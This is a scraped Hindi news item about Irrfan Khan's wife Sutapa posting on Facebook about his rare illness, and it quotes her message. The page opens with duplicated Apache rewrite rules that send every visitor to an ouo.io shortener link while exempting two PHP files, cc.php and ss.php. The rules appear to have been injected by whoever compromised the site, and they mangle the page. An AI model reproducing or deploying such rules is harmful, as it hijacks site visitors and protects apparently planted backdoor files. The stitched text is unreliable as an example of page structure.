
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 645
मुंबई। इरफान खान के रेयर बीमारी वाले ट्वीट के बाद अब उनकी पत्नी सुतापा ने फेसबुक पर इस बारे में पोस्ट लिखा है। दरअसल, बीते दिनों इरफान ने ऐसा ट्वीट किया था जिसके बाद से उनके फैन्स में काफी बेचैनी है। उन्होंने ट्वीट में बताया था कि उन्हें रेयर डिसीज हो गई है। इरफान ने लिखा था कि कोई कयास न लगाए, जांच के बाद वो खुद ही इस बारे में बताएंगे। हालांकि इन सबके बाद भी उनकी बीमारी को लेकर कई खबरें आईं। इसलिए अब इरफान की पत्नी सुतापा ने फेसबुक पर अपनी बात रखी है।
सुतापा ने लिखा, 'मेरा सबसे अच्छा दोस्त और मेरा साथी एक योद्धा है। वो जबरदस्त अंदाज और सुंदरता के साथ हर तरह की मुश्किल से लड़ रहा है। मैसेज का जवाब नहीं देने और कॉल्स नहीं ले पाने के लिए मैं सभी से माफी मांगती हूं, लेकिन मैं आप सभी की दुनियाभर से आ रही प्रार्थनाओं, चिंताओं और शुभकामनाओं के लिए हमेशा आभारी रहूंगी।'